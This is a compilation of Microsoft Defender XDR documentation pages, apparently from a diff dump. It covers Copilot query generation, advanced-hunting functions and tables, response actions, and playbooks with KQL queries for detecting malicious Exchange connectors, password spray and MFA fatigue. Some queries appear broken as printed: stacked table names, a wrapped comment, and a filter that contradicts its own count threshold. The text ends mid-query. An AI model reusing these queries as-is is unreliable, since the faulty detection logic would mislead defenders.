-> The advanced hunting capability is also available in the Copilot for Security standalone experience through the Microsoft Defender XDR plugin. Know more about [preinstalled plugins in Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins).
-
-## Try your first request
-
-1. Open the **advanced hunting** page from the navigation bar in Microsoft Defender XDR. The Copilot for Security side pane for advanced hunting appears at the right hand side.
-
- :::image type="content" source="../../media/advanced-hunting-security-copilot-pane.png" alt-text="Screenshot of the Copilot pane in advanced hunting." lightbox="../../media/advanced-hunting-security-copilot-pane-big.png":::
-
- You can also reopen Copilot by selecting **Copilot** at the top of the query editor.
-1. In the Copilot prompt bar, ask any threat hunting query that you want to run and press ![Send icon](../../media/Send.png) or **Enter** .
-
- :::image type="content" source="../../media/advanced-hunting-security-copilot-query.png" alt-text="Screenshot that shows prompt bar in the Copilot for Security for advanced hunting." lightbox="../../media/advanced-hunting-security-copilot-query-big.png":::
-
-1. Copilot generates a KQL query from your text instruction or question. While Copilot is generating, you can cancel the query generation by selecting **Stop generating**.
-
- ![Screenshot of Copilot for Security in advanced hunting generating a response.](../../media/advanced-hunting-security-copilot-generate.png)
-
-
-1. Review the generated query. You can then choose to run the query by selecting **Add and run**.
-
- ![Screenshot of Copilot button showing Add the query to query editor and run.](../../media/advanced-hunting-security-copilot-run-query.png)
-
- The generated query then appears as the last query in the query editor and runs automatically.
-
- If you need to make further tweaks, select **Add to editor**.
-
- ![Screenshot of Copilot for Security in advanced hunting showing the Add to editor option.](../../media/advanced-hunting-security-copilot-add-editor.png)
-
- The generated query appears in the query editor as the last query, where you can edit it before running using the regular **Run query** above the query editor.
-
-
-1. You can provide feedback about the generated response by selecting the feedback icon ![Screenshot of feedback icon](../../media/advanced-hunting-security-copilot-feedback-icon.png) and choosing **Confirm**, **Off-target**, or **Potentially harmful**.
--
-> [!TIP]
-> Providing feedback is an important way to let the Copilot for Security team know how well the query assistant was able to help in generating a useful KQL query. Feel free to articulate what could have made the query better, what adjustments you had to make before running the generated KQL query, or share the KQL query that you eventually used.
-
-## Query sessions
-
-You can start your first session anytime by asking a question in the Copilot side pane in advanced hunting. Your session contains the requests you made using your user account. Closing the side pane or refreshing the advanced hunting page does not discard the session. You can still access the generated queries should you need them.
-
-Select the chat bubble icon (**New chat**) to discard the current session.
-
- ![Screenshot of Copilot for Security in advanced hunting showing the new chat icon.](../../media/advanced-hunting-security-copilot-clear-session.png)
-
-## Modify settings
-
-Select the ellipses in the Copilot side pane to choose whether or not to automatically add and run the generated query in advanced hunting.
-
- ![Screenshot of Copilot for Security in advanced hunting showing the settings ellipses icon.](../../media/advanced-hunting-security-copilot-settings.png)
-
-Deselecting the **Run generated query automatically** setting gives you the option of running the generated query automatically (**Add and run**) or adding the generated query to the query editor for further modification (**Add to editor**).
security Advanced Hunting Seenby Function https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-seenby-function.md
- Title: SeenBy() function in advanced hunting for Microsoft Defender XDR
-description: Learn how to use the SeenBy() function to look for which onboarded devices discovered a certain device
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 03/29/2022--
-# SeenBy()
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `SeenBy()` function is invoked to see a list of onboarded devices that have seen a certain device using the device discovery feature.
-
-This function returns a table that has the following column:
-
-| Column | Data type | Description |
-|||-|
-| `DeviceId` | `string` | Unique identifier for the device in the service |
--
-## Syntax
-
-```kusto
-invoke SeenBy(x)
-```
--- where **x** is the device ID of interest-
-> [!TIP]
-> Enrichment functions will show supplemental information only when they are available. Availability of information is varied and depends on a lot of factors. Make sure to consider this when using SeenBy() in your queries or in creating custom detections. For best results, we recommend using the SeenBy() function with the DeviceInfo table.
-
-### Example: Obtain list of onboarded devices that have seen a device
-
-```kusto
-DeviceInfo
-| where OnboardingStatus <> "Onboarded"
-| limit 100 | invoke SeenBy()
-```
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Get more query examples](advanced-hunting-shared-queries.md)
security Advanced Hunting Shared Queries https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-shared-queries.md
- Title: Use shared queries in Microsoft Defender XDR advanced hunting
-description: Start threat hunting immediately with predefined and shared queries. Share your queries to the public or to your organization.
--
- - NOCSH
------ m365-security-- tier2- Previously updated : 02/16/2024--
-# Use shared queries in advanced hunting
--
-**Applies to:**
-- Microsoft Defender XDR-
-[Advanced hunting](advanced-hunting-overview.md) queries can be shared among users in the same organization. You can also save queries that are only accessible to you. You can also find community queries that are shared publicly on GitHub. These saved queries let you quickly pursue specific threat hunting scenarios without having to write queries from scratch.
-
-Under the Queries tab in advanced hunting, you can find the drop-down menus for **Shared queries**, **My queries**, and **Community queries**. You can select a downward-facing arrow to expand a menu.
--
-## Save, modify, and share a query
-You can save a new or existing query so that it is only accessible to you or shared with other users in your organization.
-
-1. Create or modify a query.
-
-2. Click the **Save query** drop-down button and select **Save as**.
-
-3. Enter a name for the query.
-
- :::image type="content" source="../../media/shared-query-2.png" alt-text="The new query that is about to be saved in the Microsoft Defender portal" lightbox="../../media/shared-query-2.png":::
-
-4. Select the folder where you'd like to save the query.
- - **Shared queries** ΓÇö shared to all users your organization
- - **My queries** ΓÇö accessible only to you
-
-5. Select **Save**.
-
-## Delete or rename a query
-
-1. Select the three dots to the right of a query you want to rename or delete.
-
- :::image type="content" source="../../media/advanced-hunting-del-save-query.png" alt-text="Rename or delete a query in the Advanced Hunting page in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-del-save-query.png":::
-
-2. Select **Delete** and confirm deletion. Or select **Rename** and provide a new name for the query.
-
-## Create a direct link to a query
-
-To generate a link that opens your query directly in the advanced hunting query editor, finalize your query and select **Share link**.
-
-## Access community queries in the GitHub repo
-
-Microsoft security researchers regularly share advanced hunting queries in a [designated public repository on GitHub](https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/Microsoft%20365%20Defender). Contributions to this repository are reviewed before getting published. To contribute, [join GitHub for free](https://github.com/).
-
-You can easily find these queries in the **Community queries** drop-down menu as well.
--
-Community queries are grouped into folders like *Campaigns*, *Collection*, *Defense evasion*, and the like. Further information about the query is provided as in-line comments in the query itself.
-
-> [!TIP]
-> Microsoft security researchers also provide advanced hunting queries that you can use to locate activities and indicators associated with emerging threats. These queries are provided as part of the [threat analytics](/windows/security/threat-protection/microsoft-defender-atp/threat-analytics) reports in Microsoft Defender XDR.
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Take Action https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-take-action.md
- Title: Take action on advanced hunting query results in Microsoft Defender XDR
-description: Quickly address threats and affected assets in your advanced hunting query results
--
- - NOCSH
----
- - m365-security
- - tier1
- Previously updated : 02/16/2024--
-# Take action on advanced hunting query results
--
-**Applies to:**
-- Microsoft Defender XDR--
-You can quickly contain threats or address compromised assets that you find in [advanced hunting](advanced-hunting-overview.md) using powerful and comprehensive action options. With these options, you can:
--- Take various actions on devices-- Quarantine files-
-## Required permissions
-
-To take action on devices through advanced hunting, you need a role in Microsoft Defender for Endpoint with [permissions to submit remediation actions on devices](/windows/security/threat-protection/microsoft-defender-atp/user-roles#permission-options). If you can't take action, contact a global administrator about getting the following permission:
-
-*Active remediation actions > Threat and vulnerability management - Remediation handling*
-
-To take action on emails through advanced hunting, you need a role in Microsoft Defender for Office 365 to [search and purge emails](/microsoft-365/security/office-365-security/scc-permissions).
-
-## Take various actions on devices
-
-You can take the following actions on devices identified by the `DeviceId` column in your query results:
--- Isolate affected devices to contain an infection or prevent attacks from moving laterally-- Collect investigation package to obtain more forensic information-- Run an antivirus scan to find and remove threats using the latest security intelligence updates-- Initiate an automated investigation to check and remediate threats on the device and possibly other affected devices-- Restrict app execution to only Microsoft-signed executable files, preventing subsequent threat activity through malware or other untrusted executables-
-To learn more about how these response actions are performed through Microsoft Defender for Endpoint, [read about response actions on devices](/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts).
-
-### Quarantine files
-
-You can deploy the *quarantine* action on files so that they are automatically quarantined when encountered. When selecting this action, you can choose between the following columns to identify which files in your query results to quarantine:
--- `SHA1`: In most advanced hunting tables, this column refers to the SHA-1 of the file that was affected by the recorded action. For example, if a file was copied, this affected file would be the copied file.-- `InitiatingProcessSHA1`: In most advanced hunting tables, this column refers to the file responsible for initiating the recorded action. For example, if a child process was launched, this initiator file would be part of the parent process.-- `SHA256`: This column is the SHA-256 equivalent of the file identified by the `SHA1` column.-- `InitiatingProcessSHA256`: This column is the SHA-256 equivalent of the file identified by the `InitiatingProcessSHA1` column.-
-To learn more about how quarantine actions are taken and how files can be restored, [read about response actions on files](/windows/security/threat-protection/microsoft-defender-atp/respond-file-alerts).
-
-> [!NOTE]
-> To locate files and quarantine them, the query results should also include `DeviceId` values as device identifiers.
-
-To take any of the described actions, select one or more records in your query results and then select **Take actions**. A wizard will guide you through the process of selecting and then submitting your preferred actions.
--
-## Take various actions on emails
-
-Apart from device-focused remediation steps, you can also take some actions on emails from your query results. Select the records you want to take action on, select **Take actions**, then under **Choose actions**, select your choice from the following:
--- `Move to mailbox folder` - select this to move the email messages to Junk, Inbox, or Deleted items folder-
- :::image type="content" source="../../media/advanced-hunting-take-actions-email.png" alt-text="The option Take actions in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-take-actions-email.png":::
--- `Delete email` - select this to move email messages to the Deleted items folder (**Soft delete**) or delete them permanently (**Hard delete**)-
- :::image type="content" source="../../media/advanced-hunting-take-actions-email-del.png" alt-text="The Take actions option in the Microsoft Defender portal" lightbox="../../media/advanced-hunting-take-actions-email-del.png":::
-
-You can also provide a remediation name and a short description of the action taken to easily track it in the action center history. You can also use the Approval ID to filter for these actions in the action center. This ID is provided at the end of the wizard:
--
-These email actions are applicable to [custom detections](custom-detections-overview.md) as well.
-
-## Review actions taken
-
-Each action is individually recorded in the [action center](m365d-action-center.md) under **Action center** > **History** ([security.microsoft.com/action-center/history](https://security.microsoft.com/action-center/history)). Go to the action center to check the status of each action.
-
-> [!NOTE]
-> Some tables in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Action center overview](m365d-action-center.md)
security Advanced Hunting Urlclickevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-urlclickevents-table.md
- Title: UrlClickEvents table in the advanced hunting schema
-description: Learn how to hunt for phishing campaigns and suspicious clicks using the UrlClickEvents table in the advanced hunting schema.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# UrlClickEvents
---
-**Applies to:**
-- Microsoft Defender XDR--
-The `UrlClickEvents` table in the advanced hunting schema contains information about [Safe Links](../office-365-security/safe-links-about.md) clicks from email messages, Microsoft Teams, and Office 365 apps in supported desktop, mobile, and web apps.
-
-> [!IMPORTANT]
-> This table is currently in public preview. Some information relates to a prereleased feature which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-For information on other tables in the advanced hunting schema, see [the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | The date and time when the user clicked on the link |
-| `Url` | `string` | The full URL that was clicked on by the user |
-| `ActionType` | `string` | Indicates whether the click was allowed or blocked by Safe Links or blocked due to a tenant policy, for instance, from Tenant Allow Block list|
-| `AccountUpn` | `string` | User Principal Name of the account that clicked on the link|
-| `Workload` | `string` | The application from which the user clicked on the link, with the values being Email, Office, and Teams|
-| `NetworkMessageId` | `string` | The unique identifier for the email that contains the clicked link, generated by Microsoft 365|
-| `ThreatTypes` | `string` | Verdict at the time of click, which tells whether the URL led to malware, phish or other threats|
-| `DetectionMethods` | `string` | Detection technology that was used to identify the threat at the time of click|
-| `IPAddress` | `string` | Public IP address of the device from which the user clicked on the link|
-| `IsClickedThrough` | `bool` | Indicates whether the user was able to click through to the original URL (1) or not (0)|
-| `UrlChain` | `string` | For scenarios involving redirections, it includes URLs present in the redirection chain|
-| `ReportId` | `string` | The unique identifier for a click event. For clickthrough scenarios, report ID would have same value, and therefore it should be used to correlate a click event.|
--
-You can try this example query that uses the `UrlClickEvents` table to return a list of links where a user was allowed to proceed:
-
-```kusto
-// Search for malicious links where user was allowed to proceed through
-UrlClickEvents
-| where ActionType == "ClickAllowed" or IsClickedThrough !="0"
-| where ThreatTypes has "Phish"
-| summarize by ReportId, IsClickedThrough, AccountUpn, NetworkMessageId, ThreatTypes, Timestamp
-```
-
-## Related articles
-- [Supported Microsoft Defender XDR streaming event types in event streaming API](supported-event-types.md)-- [Proactively hunt for threats](advanced-hunting-overview.md)-- [Safe Links in Microsoft Defender for Office 365](../office-365-security/safe-links-about.md)-- [Take action on advanced hunting query results](advanced-hunting-take-action.md)
security Alert Classification Malicious Exchange Connectors https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-classification-malicious-exchange-connectors.md
- Title: Alert classification for malicious exchange connectors
-description: Alert grading recipients from malicious exchange connectors activity and protect their network from malicious attack.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - MET150
Previously updated : 03/11/2024--
-# Alert classification for malicious exchange connectors
--
-**Applies to:**
--- Microsoft Defender XDR-
-Threat actors use compromised exchange connectors for sending out spam and phishing emails in bulk to unsuspecting recipients by masquerading legitimate emails. Since the connector is compromised, the emails would usually be trusted by the recipients. These kinds of phishing emails are common vectors for phishing campaigns, and business email compromise (BEC) scenario. Hence, such emails need to be monitored heavily due to the likelihood of successful recipients' compromises being high.
-
-This playbook helps in investigating instances where malicious connectors are setup/deployed by malicious actors. Accordingly, they take necessary steps to remediate the attack and mitigate the security risks arising from it. The playbook helps in classifying the alerts as either true positive (TP) or false positive (FP). If alerts are TP, the playbook lists necessary recommended actions for remediating the attack. This playbook is available for security teams who review, handle/manage, and grade the alerts.
-
-Following are the results of using a playbook:
--- Determination of the alert as malicious (TP) or benign (FP).-- If malicious, remediate/remove the malicious connector from the environment.-
-## Exchange connectors
-
-Exchange connectors are a collection of instructions that customize the way your email flows to and from your Microsoft 365 or Office 365 organization. Usually, most Microsoft 365 and Office 365 organizations don't need connectors for regular mail flow.
-
-Connectors are used to route mail traffic between remote email systems and Office 365 (O365) or O365, and on-premises email systems.
-
-## Malicious Exchange connectors
-
-Attackers may compromise an existing exchange connector or compromise an admin, and set up a new connector by sending phish or spam/bulk emails.
-
-The typical indicators of a malicious connector can be found when looking at email traffic and its headers. For example, when email traffic is observed from a connector node with a mismatch in P1 (header sender) and P2 (envelope sender) sender addresses along with no information on Sender's AccountObjectId.
-
-This alert tries to identify such instances of mail flow, wherein the mail sending activity seems suspicious adding to that relevant information on sender is unavailable.
-
-## Playbook workflow
-
-You must follow the sequence to identify malicious exchange connectors:
--- Identify which accounts are sending emails:
- - Do accounts appear to be compromised?
-- Identify the connector relaying on emails to check:
- - If the connector is supposed to send out high volume emails?
- - If the connector was modified or created recently?
-- Are emails going to internal email addresses?
- - Are emails going to external addresses (Spray and pray spam)?
- - Are emails going to external addresses belonging to customers or vendors (supply chain type attack)?
-- Check if the FROM header and Envelope Sender domains are the same or different.-
-## Investigating malicious connectors
-
-This section describes the steps to investigate an alert and remediate the security risk due to this incident.
--- Determine whether the connector demonstrates bad (malicious) behavior.
- - Look for events indicating unusual mail traffic and identify, whether any new exchange connector was added recently.
- - For mail traffic observed, determine if the email accounts are compromised by inspecting whether the accounts are responsible for unusual mail traffic.
- - Look for mail content containing malicious artifacts (bad links/attachments).
- - Look for domains that are not part of your environment.
-- Determine the email accounts are not compromised. Identify the connector that was recently added or modified in the environment.-- Look for:
- - Field values in the P1 sender (email header sender) and P2 sender (envelope sender), and check whether there's a mismatch.
- - Empty values in the SenderObjectId field.
-- Use telemetry data to note:
- - The NetworkMessageId (Message ID) of the emails that were sent from the malicious connector.
- - The connector creation date, last modified date, and last modified by date.
- - The IP address of the connector from where the email traffic is observed.
-
-## Advanced hunting queries
-
-You can use [advanced hunting](/microsoft-365/security/defender/advanced-hunting-overview?) queries to gather information related to an alert and determine whether the activity is suspicious.
-
-Ensure you have access to the following tables:
-
-|Table Name|Description|
-|||
-|EmailEvents| Contains information related to email flow.|
-|CloudAppEvents|Contains audit log of user activities.|
-|IdentityLogonEvents|Contains login information for all users.|
-
-## References
-
-AHQs samples for reference:
--- Run this KQL to check new connector creation.-
- ```KQL
- //modify timeWindow to modify the lookback.
- let timeWindow = now(-7d); let timeNow = now();
- CloudAppEvents
- | where Timestamp between (timeWindow .. timeNow)
- | where isnotempty(AccountObjectId)
- | where ActionType == "New-InboundConnector"
- | mvexpand property = RawEventData.Parameters
- | extend ConnectorName = iff(property.Name == "Name", property.Value, ""),
- IsEnabled = iff((property.Name == "Enabled" and property.Value == "True"),
- true, false)
- | where isnotempty( ConnectorName) or IsEnabled
- | project-reorder ConnectorName, IsEnabled
- ```
--- Run this KQL to check the volume of events from the alerted connector with time window of before and after the alerts.-
- ```KQL
- //modify timeWindow to modify the lookback.
- let timeWindow = now(-7d); let timeNow = now();
- let connectorOperations = pack_array("Set-OutboundConnector",
- "New-OutboundConnector", "Set-InboundConnector", "New-InboundConnector");
- let mailThreshold = 100; //define threshold for inspection and filtering
- let myConnector= //use this code block to specify relevant connector(s)
- CloudAppEvents
- | where Timestamp between (timeWindow .. timeNow)
- | where ActionType has_any (connectorOperations)
- | mv-expand property = RawEventData.Parameters
- | where property.Name == "Name"
- | summarize by ConnectorName=tostring(property.Value)
- ;
- EmailEvents
- | where isnotempty( toscalar (myConnector))
- | where Timestamp between (timeWindow .. timeNow)
- | where isnotempty( SenderObjectId) and isnotempty( Connectors)
- | where Connectors in (toscalar (myConnector))
- | summarize MailCount = dcount(NetworkMessageId) by Connectors,
- SenderObjectId, bin(Timestamp, 1h)
- | where MailCount >= mailThreshold
- ```
--- Run this KQL to check whether emails are being sent to external domains.-
- ```KQL
- //modify timeWindow to modify the lookback.
- let timeWindow = now(-7d); let timeNow = now();
- EmailEvents
- | where Timestamp between (timeWindow .. timeNow)
- | where isnotempty( SenderObjectId)
- | extend RecipientDomain= split(RecipientEmailAddress, "@")[1]
- | where (SenderFromDomain != RecipientDomain) or (SenderMailFromDomain
- != RecipientDomain)
- | where EmailDirection !in ("Intra-org" , "Inbound") //comment this line to
- look across all mailflow directions
- ```
-
- - If sent to external domains, who else in the environment is sending similar emails (Could indicate compromised user if recipient is unknown domain).
-
- ```KQL
- //modify timeWindow to modify the lookback.
- let timeWindow = now(-7d); let timeNow = now();
- let countThreshold= 100; //modify count threshold accordingly
- EmailEvents
- | where Timestamp between (timeWindow .. timeNow)
- | where isnotempty( SenderObjectId)
- | extend RecipientDomain= split(RecipientEmailAddress, "@")[1]
- | where (SenderFromDomain != RecipientDomain) or (SenderMailFromDomain
- != RecipientDomain)
- | where EmailDirection !in ("Intra-org" , "Inbound")
- | summarize MailCount= dcount(NetworkMessageId) by SenderObjectId,
- SenderFromAddress, SenderMailFromAddress , bin(Timestamp, 1h)
- | where MailCount > countThreshold
- ```
-
- - Check the mail content for bad behavior
- - Look at URLs in the email or email having attachments.
-
-## AHQ considerations
-
-Following are the AHQ considerations for protecting the recipients from malicious attack.
--- Check for admin logins for those who frequently manage connectors from unusual locations (generate stats and exclude locations from where most successful logins are observed).--- Look for login failures from unusual locations.-
- ```
- //modify timeWindow to modify the lookback.
- let timeWindow = now(-7d); let timeNow = now();
- let logonFail= materialize (
- IdentityLogonEvents
- | where Timestamp between (timeWindow .. timeNow)
- | where isnotempty(AccountObjectId)
- | where Application != "Active Directory"
- | where ActionType == "LogonFailed"
- | where ISP != "Microsoft Azure"
- | summarize failedLogonCount=count(), LatestTime = max(Timestamp),
- EarliestTime = min(Timestamp) by AccountObjectId, Application, ISP,
- CountryCode, bin(Timestamp, 60s)
- | where failedLogonCount > 100);
- // let hasLogonFails = isnotempty(toscalar (logonFail));
- let logonFailUsers = materialize ( logonFail | distinct AccountObjectId |
- take 100);
- let hasLogonFails = isnotempty(toscalar (logonFailUsers));
- let logonSuccess=
- IdentityLogonEvents
- | where hasLogonFails
- | where Timestamp between (timeWindow .. timeNow)
- | where AccountObjectId in (logonFailUsers)
- | where Application != "Active Directory"
- | where ISP != "Microsoft Azure"
- | where ActionType == "LogonSuccess"
- | project SuccessTime= Timestamp, ReportId, AccountUpn, AccountObjectId,
- ISP, CountryCode, Application;
- logonFail
- | join kind = innerunique logonSuccess on AccountObjectId, ISP, Application
- | where SuccessTime between (LatestTime .. (LatestTime + 10s))
- | summarize arg_min(SuccessTime, ReportId), EarliestFailedTime=min
- (EarliestTime), LatestFailedTime=max(LatestTime), failedLogonCount=
- take_any(failedLogonCount), SuccessLogonCount=count(), ISPSet=
- make_set(ISP), CountrySet=make_set(CountryCode), AppSet=make_set
- (Application) by AccountObjectId, AccountUpn
- | project-rename Timestamp=SuccessTime
- ```
-
-## Recommended actions
-
-Once it's determined that the observed alert activities are part of TP, classify those alerts and perform the actions below:
--- Disable or remove the connector that was found to be malicious.-- If the admin account was compromised, reset the admin's account credentials. Also, disable/revoke tokens for the compromised admin account and enable multi-factor authentication for all admin accounts.-- Look for suspicious activities performed by the admin.-- Check for other suspicious activities across other connectors in the environment.-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Investigate alerts](investigate-alerts.md)
security Alert Classification Password Spray Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-classification-password-spray-attack.md
- Title: Alert classification for password spray attacks
-description: Alert classification guide for password spray attacks coming to review the alerts and take recommended actions to remediate the attack and protect your network.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - met150
Previously updated : 02/11/2024--
-# Alert classification for password spray attacks
--
-**Applies to:**
-- Microsoft Defender XDR-
-Threat actors use innovative ways to compromise their target environments. One type of attack gaining traction is the password spray attack, where attackers aim to access many accounts within a network with minimal effort. Unlike traditional brute force attacks, where threat actors try many passwords on a single account, password spray attacks focus on guessing the correct password for many accounts with a limited set of commonly used passwords. It makes the attack particularly effective against organizations with weak or easily guessable passwords, leading to severe data breaches and financial losses for organizations.
-
-Attackers use automated tools to repeatedly attempt to gain access to a specific account or system using a list of commonly used passwords. Attackers sometimes abuse legitimate cloud services by creating many virtual machines (VMs) or containers to launch a password spray attack.
-
-This playbook helps investigate cases where suspicious behavior is observed as indicative of a password spray attack. This guide is for security teams like the security operations center (SOC) and IT administrators who review, handle/manage, and classify the alerts. This guide helps in quickly classifying the alerts as either [true positive (TP) or false positive (FP)](investigate-alerts.md) and, in the case of TP, take recommended actions to remediate the attack and mitigate the security risks.
-
-The intended results of using this guide are:
--- You've identified the alerts associated with password spray attempts as malicious (TP) or false positive (FP) activities.--- You've taken the necessary actions to remediate the attack.-
-## Investigation steps
-
-This section contains step-by-step guidance to respond to the alert and take the recommended actions to protect your organization from further attacks.
-
-### 1. Investigate the security alerts
-
- - **Are the alerted sign-in attempts coming from a suspicious location?** Check sign-in attempts from locations other than those typical for impacted user accounts. Multiple sign-in attempts from one or many users are helpful indicators.
-
-### 2. Investigate suspicious user activity
-
- - **Are there unusual events with uncommon properties?** Unique properties for an impacted user, like unusual ISP, country/region, or city, might indicate suspicious sign-in patterns.
-
- - **Is there a marked increase in email or file-related activities?** Suspicious events like increased attempts in mail access or send activity or an increase in uploading of files to SharePoint or OneDrive for an impacted user are some signs to look for.
-
- - **Are there multiple failed sign-in attempts?** A high number of failed sign-in attempts from various IPs and geographic locations by an impacted user might indicate a password spray attack.
-
- - **Identify the ISP from the sign-in activity of an impacted user.** Check for sign-in activities by other user accounts from the same ISP.
-
- - **Inspect any recent modifications in your environment:**
- - Changes in Office 365 applications like Exchange Online permission, mail auto-forwarding, mail redirection
- - Modifications in PowerApps, like automated data transmission configuration through PowerAutomate
- - Modifications in Azure environments, like Azure portal subscription changes
- - Changes to SharePoint Online, like the impacted user account gaining access to multiple sites or files with sensitive/confidential/company-only content
-
- - **Inspect the impacted account's activities that occur within a short time span on multiple platforms and apps.** Audit events to check the timeline of activities, like contrasting the user's time spent reading or sending email followed by allocating resources to the user's account or other accounts.
-
-### 3. Investigate possible follow-on attacks
-
-**Inspect your environment for other attacks involving impacted user accounts** as attackers often perform malicious activities after a successful password spray attack. Consider investigating the following possibly suspicious activities:
--- [Multi-factor authentication (MFA)](/microsoft-365/admin/security-and-compliance/multi-factor-authentication-microsoft-365)-related attacks-
- - Attackers use **MFA fatigue** to bypass this security measure that organizations adopt to protect their systems. **Check for multiple MFA requests raised by an impacted user account.**
- - Attackers might perform **MFA tampering** using an impacted user account with elevated privileges by disabling MFA protection for other accounts within the tenant. **Check for suspicious admin activities performed by an impacted user.**
--- Internal phishing attacks-
- - Attackers might use an impacted user account to send internal phishing mails. **Check suspicious activities like email forwarding or creation of inbox manipulation or inbox forwarding rules.** The following playbooks can guide you to further investigate email events:
- - [Classifying alerts for suspicious email forwarding activity](alert-grading-playbook-email-forwarding.md)
- - [Classifying alerts for suspicious inbox forwarding rules](alert-grading-playbook-inbox-forwarding-rules.md)
- - [Classifying alerts for suspicious inbox manipulation rules](alert-grading-playbook-inbox-manipulation-rules.md)
- - **Check whether the user received other alerts before the password spray activity.** Having these alerts indicate that the user account might be compromised. Examples include impossible travel alert, activity from infrequent country/region, and suspicious email deletion activity, among others.
-
-## Advanced hunting queries
-
-[Advanced hunting](/microsoft-365/security/defender/advanced-hunting-overview) is a query-based threat hunting tool that lets you inspect events in your network and locate threat indicators.
-
-Use these queries to gather more information related to the alert and determine whether the activity is suspicious.
-
-Ensure you have access to the following tables:
-- [AadSignInEventsBeta](advanced-hunting-aadsignineventsbeta-table.md)-- [CloudAppEvents](advanced-hunting-cloudappevents-table.md)-- [DeviceEvents](advanced-hunting-deviceevents-table.md)-- [EmailEvents](advanced-hunting-emailevents-table.md)-- [EmailUrlInfo](advanced-hunting-emailurlinfo-table.md)-- [IdentityLogonEvents](advanced-hunting-identitylogonevents-table.md)-- [UrlClickEvents](advanced-hunting-urlclickevents-table.md)--
-Use this query to identify password spray activity.
-
-```kusto
-IdentityLogonEvents
-| where Timestamp > ago(7d)
-| where ActionType == "LogonFailed"
-| where isnotempty(RiskLevelDuringSignIn)
-| where AccountObjectId == <Impacted User Account Object ID>
-| summarize TargetCount = dcount(AccountObjectId), TargetCountry = dcount(Location), TargetIPAddress = dcount(IPAddress) by ISP
-| where TargetCount >= 100
-| where TargetCountry >= 5
-| where TargetIPAddress >= 25
-```
-
-Use this query to identify other activities from the alerted ISP.
-
-```kusto
-CloudAppEvents
-| where Timestamp > ago(7d)
-| where AccountObjectId == <Impacted User Account Object ID>
-| where ISP == <Alerted ISP>
-| summarize count() by Application, ActionType, bin(Timestamp, 1h)
-```
-
-Use this query to identify sign-in patterns for the impacted user.
-
-```kusto
-IdentityLogonEvents
-| where Timestamp > ago(7d)
-| where AccountObjectId == <Impacted User Account Object ID>
-| where ISP == <Alerted ISP>
-| where Application != "Active Directory"
-| summarize SuccessCount = countif(ActionType == "LogonSuccess"), FailureCount = countif(ActionType == "LogonFailed") by ISP
-```
-
-Use this query to identify MFA fatigue attacks.
-
-```kusto
-AADSignInEventsBeta
-| where Timestamp > ago(1h)
-//Error Code : 50088 : Limit on telecom MFA calls reached
-//Error Code : 50074 : Strong Authentication is required.
-| where ErrorCode in ("50074","50088")
-| where isnotempty(AccountObjectId)
-| where isnotempty(IPAddress)
-| where isnotempty(Country)
-| summarize (Timestamp, ReportId) = arg_max(Timestamp, ReportId), FailureCount = count() by AccountObjectId, Country, IPAddress
-| where FailureCount >= 10
-```
-
-Use this query to identify MFA reset activities.
-
-```kusto
-let relevantActionTypes = pack_array("Disable Strong Authentication.","system.mfa.factor.deactivate", "user.mfa.factor.update", "user.mfa.factor.reset_all", "core.user_auth.mfa_bypass_attempted");
-CloudAppEvents
-AlertInfo
-| where Timestamp > ago(1d)
-| where isnotempty(AccountObjectId)
-| where Application in ("Office 365","Okta")
-| where ActionType in (relevantActionTypes)
-| where RawEventData contains "success"
-| project Timestamp, ReportId, AccountObjectId, IPAddress, ActionType
---
-CloudAppEvents
-| where Timestamp > ago(1d)
-| where ApplicationId == 11161
-| where ActionType == "Update user."
-| where isnotempty(AccountObjectId)
-| where RawEventData has_all("StrongAuthenticationRequirement","[]")
-| mv-expand ModifiedProperties = RawEventData.ModifiedProperties
-| where ModifiedProperties.Name == "StrongAuthenticationRequirement" and ModifiedProperties.OldValue != "[]" and ModifiedProperties.NewValue == "[]"
-| mv-expand ActivityObject = ActivityObjects
-| where ActivityObject.Role == "Target object"
-| extend TargetObjectId = tostring(ActivityObject.Id)
-| project Timestamp, ReportId, AccountObjectId, ActivityObjects, TargetObjectId
-```
-
-Use this query to find new email inbox rules created by the impacted user.
-
-```kusto
-CloudAppEvents
